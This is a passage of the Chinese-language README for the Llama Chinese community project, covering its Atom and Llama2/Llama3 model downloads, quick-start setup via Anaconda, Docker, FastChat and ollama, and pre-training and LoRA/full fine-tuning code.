数据准备](#step2-数据准备) - [Step3: 微调脚本](#step3-微调脚本) * [LoRA微调](#lora微调) * [全量参数微调](#全量参数微调) - [Step4: 加载微调模型](#step4-加载微调模型) * [LoRA微调](#lora微调-1) * [全量参数微调](#全量参数微调-1) + [🍄 模型量化](#-模型量化) + [🚀 部署加速](#-部署加速) - [TensorRT-LLM](#tensorrt-llm) - [vLLM](#vllm) - [JittorLLMs](#jittorllms) - [lmdeploy](#lmdeploy) + [💪 外延能力](#-外延能力) - [LangChain](#langchain) * [🥇 模型评测](#-模型评测) + [Llama2和Llama3对比评测](#llama2和llama3对比评测) + [Llama3模型评测](#llama3模型评测) + [Llama2模型评测](#llama2模型评测) * [📖 学习中心](#-学习中心) + [Llama3](#llama3) + [Llama2](#llama2) - [Meta官方对于Llama2的介绍](#meta官方对于llama2的介绍) + [Llama相关论文](#llama相关论文) - [📌 其它](#-其它) * [🎉 致谢](#-致谢) * [🤔 问题反馈](#-问题反馈) ## 📌 Llama中文社区 ### 🔥 社区介绍:llama中文社区 欢迎来到Llama中文社区!我们是一个专注于Llama模型在中文方面的优化和上层建设的高级技术社区。 **已经基于大规模中文数据,从预训练开始对Llama2模型进行中文能力的持续迭代升级【Done】**。**正在对Llama3模型进行中文能力的持续迭代升级【Doing】** 我们热忱欢迎对大模型LLM充满热情的开发者和研究者加入我们的行列。 <details> #### 为什么选择Llama中文社区? 🚀 **高级工程师团队支持**:社区有一批专注为大家服务的NLP高级工程师,我们有着强大的技术支持和丰富的经验,为您提供专业的指导和帮助。 🎯 **中文优化**:我们致力于在Llama模型的中文处理方面进行优化,探索适用于中文的最佳实践,以提升其性能和适应性【支持Llama2、Llama3】。 💡 **创新交流**:我们拥有一支富有创造力和经验的社区成员团队,定期组织线上活动、技术研讨和经验分享,促进成员间的创新交流。 🌐 **全球联结**:我们欢迎来自世界各地的开发者加入社区,构建一个开放、多元化的学习和交流平台。 🤝 **开放共享**:我们鼓励社区成员开源分享代码和模型,推动合作共赢,共同促进中文NLP技术的发展。 #### 社区活动 🗓️ **线上讲座**:邀请行业内专家进行线上讲座,分享Llama在中文NLP领域的最新技术和应用,探讨前沿研究成果。 💻 **项目展示**:成员可展示自己在Llama中文优化方面的项目成果,获得反馈和建议,促进项目协作。 📚 **学习资源**:社区维护丰富的学习资料库,包括教程、文档和论文解读,为成员提供全面的学习支持。 📝 **论文解读**:社区成员共同解读与Llama相关的最新研究论文,深入理解前沿算法和方法。 🎉 **主题活动**:定期举办各类主题活动,包括挑战赛、黑客马拉松和技术沙龙,让社区成员在轻松愉快的氛围中交流和学习。 🌟 **奖励计划**:我们设立奖励计划,对社区中积极参与、贡献优秀的成员给予荣誉和奖励,激励更多优秀人才的加入。 📈 **技术咨询**:我们提供技术咨询服务,解答您在Llama开发和优化过程中遇到的问题,助您快速攻克难关。 🚀 **项目合作**:鼓励成员间的项目合作,共同探索Llama在实际应用中的潜力,打造创新解决方案。 #### 立即加入我们! 📚 **愿景**:无论您是对Llama已有研究和应用经验的专业开发者,还是对Llama中文优化感兴趣并希望深入探索的新手,我们都热切期待您的加入。在Llama中文社区,您将有机会与行业内顶尖人才共同交流,携手推动中文NLP技术的进步,开创更加美好的技术未来! 🔗 **温馨提示**:本社区为专业技术交流平台,我们热切期望志同道合的开发者和研究者加入。请遵守社区准则,共同维护积极向上的学习氛围。感谢您的理解和支持! </details> ### 📢 最新动态 【最新】2024年07月24日:开源最强[Llama 3.1](https://llama.meta.com/docs/overview)模型发布,包含8B、70B和405B! 【最新】2024年07月16日:[社区论坛](https://forum.llamafamily.cn/)上线,有大模型问题,就找Llama中文社区! 

【最新】2024年05月15日:支持ollama运行Llama3-Chinese-8B-Instruct、Atom-7B-Chat,[详细使用方法](https://github.com/LlamaFamily/Llama-Chinese?tab=readme-ov-file#%E5%BF%AB%E9%80%9F%E4%B8%8A%E6%89%8B-%E4%BD%BF%E7%94%A8ollama%E8%BF%90%E8%A1%8C)。

【最新】2024年04月23日:社区增加了llama3 8B中文微调模型[Llama3-Chinese-8B-Instruct](https://github.com/LlamaFamily/Llama-Chinese?tab=readme-ov-file#llama3%E4%B8%AD%E6%96%87%E5%BE%AE%E8%B0%83%E6%A8%A1%E5%9E%8B)以及对应的[免费API调用](https://llama.family/docs/chat-completion-v1)。

【最新】2024年04月19日:社区增加了llama3 8B、llama3 70B[在线体验链接](https://llama.family/chat/#/)。

【最新】2024年04月14日:社区更新了四个专家角色:心理咨询师、羊驼夸夸 、律师、医生。链接:[角色role](https://llama.family/tools/#/agent)。

【最新】2024年04月10日:Atom-7B-Chat 模型回答内容相较之前更为丰富、增强了模型的指令遵循能力和回答稳定性、优化了ppo的奖励模型。下载链接[modelscope](https://modelscope.cn/models/FlagAlpha/Atom-7B-Chat)、[Huggingface](https://huggingface.co/FlagAlpha/Atom-7B-Chat)。

【最新】2024年04月01日:社区上线了Llama中文[应用平台](https://llama.family/store);同时如果你有优秀的应用需要推广可以填写[申请表](https://atomecho.feishu.cn/share/base/form/shrcnFqpN71OmBoXDCT6y0TQgIc)。

【最新】2024年03月28日:[社区免费公开课](https://mp.weixin.qq.com/s/CsturoU1pOX11CqVnZgu2A)。

【最新】2024年03月08日:开放了免费API供大家使用,包含(Atom-1B,7B,13B 3种中文大模型)[API使用链接](https://llama.family/docs/chat-completion-v1)

【最新】2023年10月8日:新增清华大学JittorLLMs的推理加速功能[JittorLLMs](#jittorllms)!

<details>

- 2023年9月12日:更新预训练版本[Atom-7B](https://huggingface.co/FlagAlpha/Atom-7B)和对话版本[Atom-7B-Chat](https://huggingface.co/FlagAlpha/Atom-7B-Chat)模型参数,最新的中文预训练数据量为2.7TB token,训练进程见[llama.family](https://llama.family/)!
- 2023年9月2日:新增模型[预训练代码](#-模型预训练)和[全量参数微调代码](#-模型微调)!
- 2023年8月28日:发布基于Llama2进行中文预训练的开源大模型[Atom-7B](https://huggingface.co/FlagAlpha/Atom-7B),并将持续更新,详情参考[社区公众号文章](https://mp.weixin.qq.com/s/Bdx0JTVh1kgPn5ydYxIkEw)!
- 2023年8月26日:提供[FastAPI](#fastapi接口搭建)接口搭建脚本!
- 2023年8月26日:提供将Meta原始模型参数转换为兼容Hugging Face的[格式转化脚本](https://github.com/LlamaFamily/Llama-Chinese/blob/main/scripts/convert2hf/README.md)!
- 2023年8月26日:新增[Code Llama](#-代码模型)模型!
- 2023年8月15日:新增[PEFT加载微调模型参数](#加载微调模型)的代码示例!
- 2023年8月14日:[大模型数据共享训练平台](https://llama.family)上线,没有算力也能参与大模型训练,社区每位成员贡献的数据都将决定模型能力的未来走向!
- 2023年8月3日:新增FasterTransformer和vLLM的GPU[推理加速](#-推理加速)支持!
- 2023年7月31日:【重磅】国内首个真正意义上的Llama2中文大模型发布!详情参见[社区公众号文章](https://mp.weixin.qq.com/s/lExUU7z_MvgJ7tzQPF8tUQ)
- 2023年7月28日:通过[Docker部署](#docker部署问答接口)问答接口!
- 2023年7月27日:新增[LangChain](#langchain)支持!
- 2023年7月26日:新增Llama2-13B中文微调参数的[4bit量化压缩版本](#-模型量化)!
- 2023年7月25日:社区微信公众号“Llama中文社区”欢迎大家关注,获取最新分享和动态!
- 2023年7月24日:[FlagAlpha](https://huggingface.co/FlagAlpha)新增Llama2-13B中文微调参数!
- 2023年7月24日:[llama.family](https://llama.family/)新增Llama2-70B在线体验!
- 2023年7月23日:Llama2中文微调参数发布至Hugging Face仓库[FlagAlpha](https://huggingface.co/FlagAlpha)!
- 2023年7月22日:Llama2在线体验链接[llama.family](https://llama.family/)上线,同时包含Meta原版和中文微调版本!
- 2023年7月21日:评测了Meta原始版Llama2 Chat模型的[中文问答能力](#-模型评测)!
- 2023年7月21日:新增Llama2模型的Hugging Face版本国内下载地址!
- 2023年7月20日:新增[飞书知识库文档](https://chinesellama.feishu.cn/wiki/space/7257824476874768388?ccm_open_type=lark_wiki_spaceLink),欢迎大家一起共建!
- 2023年7月20日:国内Llama2最新下载地址上线! - 2023年7月19日:正式启动Llama2模型的中文预训练,关注我们获取实时动态! - 2023年7月19日:Llama2国内下载地址正在启动,敬请期待! - 2023年7月19日:开启Llama2中文社区,欢迎大家加入! </details> ### 🤗 模型 #### 🔵 中文预训练模型Atom **原子大模型Atom**由Llama中文社区和原子回声联合打造。 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | --------------- | --------------- | ------------------------------ | ------------------------------------------------------------ | | 预训练 | Atom-7B | FlagAlpha/Atom-7B | [HuggingFace](https://huggingface.co/FlagAlpha/Atom-7B) \| [ModelScope](https://modelscope.cn/models/FlagAlpha/Atom-7B) \| [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B) | | Chat | Atom-7B-Chat | FlagAlpha/Atom-7B-Chat | [HuggingFace](https://huggingface.co/FlagAlpha/Atom-7B-Chat) \| [ModelScope](https://modelscope.cn/models/FlagAlpha/Atom-7B-Chat) \| [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat)| Atom系列模型包含Atom-13B、Atom-7B和Atom-1B,基于Llama2做了中文能力的持续优化。Atom-7B和Atom-7B-Chat目前已完全开源,支持商用,可在[Hugging Face](https://huggingface.co/FlagAlpha)仓库获取模型,详情见[Atom-7B下载](#基于llama2的中文预训练模型atom)。Atom大模型针对中文做了以下优化: - 大规模的中文数据预训练 原子大模型Atom在Llama2的基础上,采用大规模的中文数据进行持续预训练,包含百科、书籍、博客、新闻、公告、小说、金融数据、法律数据、医疗数据、代码数据、专业论文数据、中文自然语言处理竞赛数据集等,详见[📝 数据来源](#-数据来源)。 同时对庞大的数据进行了过滤、打分、去重,筛选出超过1T token的高质量中文数据,持续不断加入训练迭代中。 - 更高效的中文词表 为了提高中文文本处理的效率,我们针对Llama2模型的词表进行了深度优化。首先,我们基于数百G的中文文本,在该模型词表的基础上扩展词库至65,000个单词。经过测试,我们的改进使得中文编码/解码速度提高了约350%。此外,我们还扩大了中文字符集的覆盖范围,包括所有emoji符号😊。这使得生成带有表情符号的文章更加高效。 - 自适应上下文扩展 Atom大模型默认支持4K上下文,利用位置插值PI和Neural Tangent Kernel (NTK)方法,经过微调可以将上下文长度扩增到32K。 - 📝 中文数据 我们通过以下数据来优化Llama2的中文能力: | 类型 | 描述 | | ---------------------------------------------------------- | ------------------------------------------------------------ | | 网络数据 | 互联网上公开的网络数据,挑选出去重后的高质量中文数据,涉及到百科、书籍、博客、新闻、公告、小说等高质量长文本数据。 | | [Wikipedia](https://github.com/goldsmith/Wikipedia) | 中文Wikipedia的数据 | | [悟道](https://github.com/BAAI-WuDao/Model) | 中文悟道开源的200G数据 | | [Clue](https://github.com/CLUEbenchmark/CLUEDatasetSearch) | Clue开放的中文预训练数据,进行清洗后的高质量中文长文本数据 | | 竞赛数据集 | 近年来中文自然语言处理多任务竞赛数据集,约150个 | | [MNBVC](https://github.com/esbatmop/MNBVC) | MNBVC 中清洗出来的部分数据集 社区提供预训练版本Atom-7B和基于Atom-7B进行对话微调的模型参数供开放下载,关于模型的进展详见社区官网[llama.family](https://llama.family)。 #### Llama3官方模型 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 预训练 | Llama3-8B | meta-llama/Meta-Llama-3-8B | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-8B) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 预训练 | Llama3-70B | meta-llama/Meta-Llama-3-70B | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-7B) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 对话模型 | Llama3-8B-Chat | meta-llama/Meta-Llama-3-8B-Instruct | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 对话模型 | Llama3-70B-Chat | meta-llama/Meta-Llama-3-70B-Instruct | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-70B-Instruct) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | #### Llama3中文微调模型 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 对话模型 | Llama3-Chinese-8B-Instruct | FlagAlpha/Llama3-Chinese-8B-Instruct | [HuggingFace](https://huggingface.co/FlagAlpha/Llama3-Chinese-8B-Instruct) \| [modelscope](https://modelscope.cn/models/FlagAlpha/Llama3-Chinese-8B-Instruct/summary) \| [wisemodel](https://wisemodel.cn/models/FlagAlpha/Llama3-Chinese-8B-Instruct/file) | #### 
Llama2官方模型 <details> | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 预训练 | Llama2-7B | meta-llama/Llama-2-7b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-7b-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_t0dUikZqOwt-5DZWHuMvqA1?pwd=66ep) | | 预训练 | Llama2-13B | meta-llama/Llama-2-13b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-13b-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_yT_9G8xNOz0SDWQ7Mb_GZA1?pwd=yvgf) | | 预训练 | Llama2-70B | meta-llama/Llama-2-70b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-70b-hf) | | Chat | Llama2-7B-Chat | meta-llama/Llama-2-7b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_oaV4BpKFgKLto4KgOhBcaA1?pwd=ufir) | | Chat | Llama2-13B-Chat | meta-llama/Llama-2-13b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_yA-9G34NGL9B79b3OQZZGA1?pwd=xqrg) | | Chat | Llama2-70B-Chat | meta-llama/Llama-2-70b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-70b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VNa_vCGzCy3h3N7oeFXs2W1hA1?pwd=uhxh#) | | Code | CodeLlama-7b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1cIPzdNywWLvQI7_2QanOEQ?pwd=zfwi) | | Code | CodeLlama-7b-Python | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1liY8klGoDagYbpw-g-oFag?pwd=i952) | | Code | CodeLlama-7b-Instruct | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/108o9_DT2E_vfSGtOnDCQVw?pwd=zkt9) | | Code | CodeLlama-13b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1lLaeHv0XEBv0iiZzI1dpnw?pwd=qn99) | | Code | CodeLlama-13b-Python | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1OLVfvZS_oqL3oqMKwsI87w?pwd=a78k) | | Code | CodeLlama-13b-Instruct | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1HyxJl4w8wElgkZRh2ATrXQ?pwd=seg6) | | Code | CodeLlama-34b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1vEw0pFgIkctPUN4_5_6pIQ?pwd=q8eu) | Meta官方在2023年8月24日发布了Code Llama,基于代码数据对Llama2进行了微调,提供三个不同功能的版本:基础模型(Code Llama)、Python专用模型(Code Llama - Python)和指令跟随模型(Code Llama - Instruct),包含7B、13B、34B三种不同参数规模。不同模型能力区别如下表所示: | 模型类别 | 模型名称 | 代码续写 | 代码填充 | 指令编程 | |-----------------------|------------------------|------|------|------| | Code Llama | CodeLlama-7b | ✅ | ✅ | ❌ | | | CodeLlama-13b | ✅ | ✅ | ❌ | | | CodeLlama-34b | ✅ | ❌ | ❌ | | Code Llama - Python | CodeLlama-7b-Python | ✅ | ❌ | ❌ | | | CodeLlama-13b-Python | ✅ | ❌ | ❌ | | | CodeLlama-34b-Python | ✅ | ❌ | ❌ | | Code Llama - Instruct | CodeLlama-7b-Instruct | ❌ | ✅ | ✅ | | | CodeLlama-13b-Instruct | ❌ | ✅ | ✅ | | | CodeLlama-34b-Instruct | ❌ | ❌ | ✅ | 关于Code Llama的详细信息可以参考官方Github仓库[codellama](https://github.com/facebookresearch/codellama)。 </details> #### Llama2中文微调模型 我们基于中文指令数据集对Llama2-Chat模型进行了微调,使得Llama2模型有着更强的中文对话能力。LoRA参数以及与基础模型合并的参数均已上传至[Hugging Face](https://huggingface.co/FlagAlpha),目前包含7B和13B的模型。 | 类别 | 模型名称 | 🤗模型加载名称 | 基础模型版本 | 下载地址 | | ---------- | ---------- | ------------- | ----------------- | ------------------- | | 合并参数 | Llama2-Chinese-7b-Chat | FlagAlpha/Llama2-Chinese-7b-Chat | meta-llama/Llama-2-7b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-7b-Chat) | | 合并参数 | Llama2-Chinese-13b-Chat | FlagAlpha/Llama2-Chinese-13b-Chat| meta-llama/Llama-2-13b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat) | | LoRA参数 | 
Llama2-Chinese-7b-Chat-LoRA | FlagAlpha/Llama2-Chinese-7b-Chat-LoRA | meta-llama/Llama-2-7b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-7b-Chat-LoRA) | | LoRA参数 | Llama2-Chinese-13b-Chat-LoRA | FlagAlpha/Llama2-Chinese-13b-Chat-LoRA | meta-llama/Llama-2-13b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat-LoRA) | ### 社区资源 社区资源的丰富性是社区发展的重要保障,它涵盖了各种方面,其中包括但不限于以下四个方面:算力、数据、论坛和应用。在这些方面的积极发展与充分利用,将为社区成员提供更多的机会和支持,推动整个社区向着更加繁荣的方向发展。更多的内容请看[llama.family](https://llama.family/) <details> #### 💻 算力 - 提供低于市场价格的算力资源,可用于各类计算任务,如深度学习模型的训练、推理等。 - 为社区成员提供专属的在线推理服务,让用户可以快速有效地对模型进行推理操作。 - 提供一键在线微调服务,使用户可以方便地对模型进行微调,以适应不同的任务和数据。 #### 📊 数据 - 开放丰富的训练数据资源,覆盖多个领域和行业,为模型训练提供充足的数据支持。 - 提供高质量、多样化的数据集,以满足不同用户的需求,并支持数据共享和交流,促进数据资源的充分利用。 #### 💬 论坛 - 社区论坛为社区成员提供了一个在线交流和讨论技术问题的平台。 - 在论坛上,用户可以分享经验、提出问题、解答疑惑,促进技术交流和合作。 - 论坛还可以定期举办线上活动、研讨会等,增进社区成员之间的联系和了解。 #### 📱 应用 - 免费提供应用推广展示位,让开发者可以将他们的应用充分展示给社区成员。 - 提供推广的帮助,包括但不限于宣传推广、用户引导等服务,帮助应用获得更多的曝光和用户。 - 通过社区平台,为优秀的应用提供合作机会,促进应用开发者之间的合作和交流,共同推动应用的发展和壮大。 </details> ## 📌 如何使用Llama模型? 你可以选择下面的快速上手的任一种方式,开始使用 Llama 系列模型。推荐使用[中文预训练对话模型](#llama2中文预训练模型atom-7b)进行使用,对中文的效果支持更好。 ### 快速上手-使用Anaconda 第 0 步:前提条件 - 确保安装了 Python 3.10 以上版本。 第 1 步:准备环境 如需设置环境,安装所需要的软件包,运行下面的命令。 ```bash git clone https://github.com/LlamaFamily/Llama-Chinese.git cd Llama-Chinese pip install -r requirements.txt ``` 第 2 步:下载模型 你可以从以下来源下载Atom-7B-Chat模型。 - [HuggingFace](https://huggingface.co/FlagAlpha) - [ModelScope](https://modelscope.cn/organization/FlagAlpha) - [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat) 第 3 步:进行推理 使用Atom-7B-Chat模型进行推理 创建一个名为 quick_start.py 的文件,并将以下内容复制到该文件中。 ```python import torch from transformers import AutoTokenizer, AutoModelForCausalLM device_map = "cuda:0" if torch.cuda.is_available() else "auto" model = AutoModelForCausalLM.from_pretrained('FlagAlpha/Atom-7B-Chat',device_map=device_map,torch_dtype=torch.float16,load_in_8bit=True,trust_remote_code=True,use_flash_attention_2=True) model =model.eval() tokenizer = AutoTokenizer.from_pretrained('FlagAlpha/Atom-7B-Chat',use_fast=False) tokenizer.pad_token = tokenizer.eos_token input_ids = tokenizer(['<s>Human: 介绍一下中国\n</s><s>Assistant: '], return_tensors="pt",add_special_tokens=False).input_ids if torch.cuda.is_available(): input_ids = input_ids.to('cuda') generate_input = { "input_ids":input_ids, "max_new_tokens":512, "do_sample":True, "top_k":50, "top_p":0.95, "temperature":0.3, "repetition_penalty":1.3, "eos_token_id":tokenizer.eos_token_id, "bos_token_id":tokenizer.bos_token_id, "pad_token_id":tokenizer.pad_token_id } generate_ids = model.generate(**generate_input) text = tokenizer.decode(generate_ids[0]) print(text) ``` 运行 quick_start.py 代码。 ```bash python quick_start.py ``` ### 快速上手-使用Docker 详情参见:[Docker部署](https://github.com/LlamaFamily/Llama-Chinese/blob/main/docs/chat_gradio_guide.md) 第 1 步:准备docker镜像,通过docker容器启动[chat_gradio.py](../examples/chat_gradio.py) ```bash git clone https://github.com/LlamaFamily/Llama-Chinese.git cd Llama-Chinese docker build -f docker/Dockerfile -t flagalpha/llama2-chinese:gradio . 
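# Optional: verify that the image was built before starting it in the next step
docker images | grep llama2-chinese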
``` 第 2 步:通过docker-compose启动chat_gradio ```bash cd Llama-Chinese/docker docker-compose up -d --build ``` ### 快速上手-使用llama.cpp 详情参见:[使用llama.cpp](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/CPU/ggml/README.md) ### 快速上手-使用gradio 基于gradio搭建的问答界面,实现了流式的输出,将下面代码复制到控制台运行,以下代码以Atom-7B-Chat模型为例,不同模型只需修改一下面的model_name_or_path对应的模型名称就好了😊 ``` python examples/chat_gradio.py --model_name_or_path FlagAlpha/Atom-7B-Chat ``` ### 快速上手-构建API服务 使用FastChat构建和OpenAI一致的推理服务接口。 <details> 第 0 步:前提条件 安装fastchat ```bash pip3 install "fschat[model_worker,webui]" ``` 第 1 步:启动Restful API 开启三个控制台分别执行下面的三个命令 - 首先启动controler ```bash python3 -m fastchat.serve.controller \ --host localhost \ --port 21001 ``` - 启动模型 ```bash CUDA_VISIBLE_DEVICES="0" python3 -m fastchat.serve.model_worker --model-path /path/Atom-7B-Chat \ --host localhost \ --port 21002 \ --worker-address "http://localhost:21002" \ --limit-worker-concurrency 5 \ --stream-interval 2 \ --gpus "1" \ --load-8bit ``` - 启动RESTful API 服务 ```bash python3 -m fastchat.serve.openai_api_server \ --host localhost \ --port 21003 \ --controller-address http://localhost:21001 ``` 第 2 步:测试api服务 执行下面的python代码测试上面部署的api服务 ```python # coding=utf-8 import json import time import urllib.request import sys import requests def test_api_server(input_text): header = {'Content-Type': 'application/json'} data = { "messages": [{"role": "system", "content": ""}, {"role": "user", "content": input_text}], "temperature": 0.3, "top_p" : 0.95, "max_tokens": 512, "model": "LLama2-Chinese-13B", "stream" : False, "n" : 1, "best_of": 1, "presence_penalty": 1.2, "frequency_penalty": 0.2, "top_k": 50, "use_beam_search": False, "stop": [], "ignore_eos" :False, "logprobs": None } response = requests.post( url='http://127.0.0.1:21003/v1/chat/completions', headers=header, data=json.dumps(data).encode('utf-8') ) result = None try: result = json.loads(response.content) print(json.dumps(data, ensure_ascii=False, indent=2)) print(json.dumps(result, ensure_ascii=False, indent=2)) except Exception as e: print(e) return result if __name__ == "__main__": test_api_server("如何去北京?") ``` </details> ### 快速上手-使用ollama运行 1. 首先需要安装ollama工具 安装方法参考:[https://ollama.com](https://ollama.com/) 2. 
ollama运行Llama3-Chinese-8B-Instruct、Atom-7B-Chat ollama运行基于Llama3进行中文微调的大模型[Llama3-Chinese-8B-Instruct](https://huggingface.co/FlagAlpha/Llama3-Chinese-8B-Instruct) 打开命令行执行命令 ``` ollama run llamafamily/llama3-chinese-8b-instruct ``` ollama运行基于Llama2进行中文预训练的开源大模型[Atom-7B-Chat](https://huggingface.co/FlagAlpha/Atom-7B-Chat) 打开命令行执行命令 ``` ollama run llamafamily/atom-7b-chat ``` ## 🤖 模型预训练 虽然Llama2的预训练数据相对于第一代LLaMA扩大了一倍,但是中文预训练数据的比例依然非常少,仅占0.13%,这也导致了原始Llama2的中文能力较弱。为了能够提升模型的中文能力,可以采用微调和预训练两种路径,其中: - 微调需要的算力资源少,能够快速实现一个中文Llama的雏形。但缺点也显而易见,只能激发基座模型已有的中文能力,由于Llama2的中文训练数据本身较少,所以能够激发的能力也有限,治标不治本。 - 基于大规模中文语料进行预训练,成本高,不仅需要大规模高质量的中文数据,也需要大规模的算力资源。但是优点也显而易见,就是能从模型底层优化中文能力,真正达到治本的效果,从内核为大模型注入强大的中文能力。 我们为社区提供了Llama模型的预训练代码,以及[中文测试语料](https://github.com/LlamaFamily/Llama-Chinese/tree/main/data),更多数据可以参考[中文语料](#-中文数据)。具体代码和配置如下: - 模型预训练脚本:[train/pretrain/pretrain.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain.sh) - 预训练实现代码:[train/pretrain/pretrain_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain_clm.py) - [DeepSpeed](https://github.com/microsoft/DeepSpeed)加速: - 对于单卡训练,可以采用ZeRO-2的方式,参数配置见 [train/pretrain/ds_config_zero2.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero2.json) - 对于多卡训练,可以采用ZeRO-3的方式,参数配置见 [train/pretrain/ds_config_zero3.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero3.json) - 训练效果度量指标:[train/pretrain/accuracy.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/accuracy.py) ## 💡 模型微调 本仓库中同时提供了LoRA微调和全量参数微调代码,关于LoRA的详细介绍可以参考论文“[LoRA: Low-Rank Adaptation of Large Language Models](https://arxiv.org/abs/2106.09685)”以及微软Github仓库[LoRA](https://github.com/microsoft/LoRA)。 ### Step1: 环境准备 根据[requirements.txt](https://github.com/LlamaFamily/Llama-Chinese/blob/main/requirements.txt)安装对应的环境依赖。 ### Step2: 数据准备 在data目录下提供了一份用于模型sft的数据样例: - 训练数据:[data/train_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/train_sft.csv) - 验证数据:[data/dev_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/dev_sft.csv) 每个csv文件中包含一列“text”,每一行为一个训练样例,每个训练样例按照以下格式将问题和答案组织为模型输入,您可以按照以下格式自定义训练和验证数据集: ``` "<s>Human: "+问题+"\n</s><s>Assistant: "+答案+"\n"</s> ``` 例如, ``` <s>Human: 用一句话描述地球为什么是独一无二的。</s><s>Assistant: 因为地球是目前为止唯一已知存在生命的行星。</s> ``` ### Step3: 微调脚本 #### LoRA微调 LoRA微调脚本见:[train/sft/finetune_lora.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_lora.sh),关于LoRA微调的具体实现代码见[train/sft/finetune_clm_lora.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm_lora.py),单机多卡的微调可以通过修改脚本中的`--include localhost:0`来实现。 #### 全量参数微调 全量参数微调脚本见:[train/sft/finetune.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune.sh),关于全量参数微调的具体实现代码见[train/sft/finetune_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm.py)。 ### Step4: 加载微调模型 #### LoRA微调 基于LoRA微调的模型参数见:[基于Llama2的中文微调模型](#llama2中文微调模型),LoRA参数需要和基础模型参数结合使用。 通过[PEFT](https://github.com/huggingface/peft)加载预训练模型参数和微调模型参数,以下示例代码中,base_model_name_or_path为预训练模型参数保存路径,finetune_model_path为微调模型参数保存路径。 ```python import torch from transformers import AutoTokenizer, AutoModelForCausalLM from peft import PeftModel,PeftConfig # 例如: finetune_model_path='FlagAlpha/Llama2-Chinese-7b-Chat-LoRA' finetune_model_path='' config = PeftConfig.from_pretrained(finetune_model_path) # 例如: base_model_name_or_path='meta-llama/Llama-2-7b-chat' tokenizer = 
## 🤖 Model Pre-training

Although Llama2's pre-training data is twice the size of the first-generation LLaMA's, the share of Chinese pre-training data is still very small, only about 0.13%, which is why the original Llama2 is relatively weak in Chinese. To improve the model's Chinese ability there are two paths, fine-tuning and pre-training:

- Fine-tuning needs few compute resources and can quickly produce a prototype of a Chinese Llama. The drawback is just as obvious: it can only activate the Chinese ability the base model already has, and since Llama2 saw little Chinese training data, the ability that can be activated is limited. It treats the symptoms, not the cause.
- Pre-training on a large-scale Chinese corpus is costly: it requires both large amounts of high-quality Chinese data and large-scale compute. The advantage is equally obvious: it improves Chinese ability at the model's core and truly addresses the root cause, injecting strong Chinese capability into the model.

We provide the community with pre-training code for the Llama models, along with a [Chinese test corpus](https://github.com/LlamaFamily/Llama-Chinese/tree/main/data); more data is listed under [Chinese corpora](#-中文数据). The code and configuration are as follows:

- Pre-training script: [train/pretrain/pretrain.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain.sh)
- Pre-training implementation: [train/pretrain/pretrain_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain_clm.py)
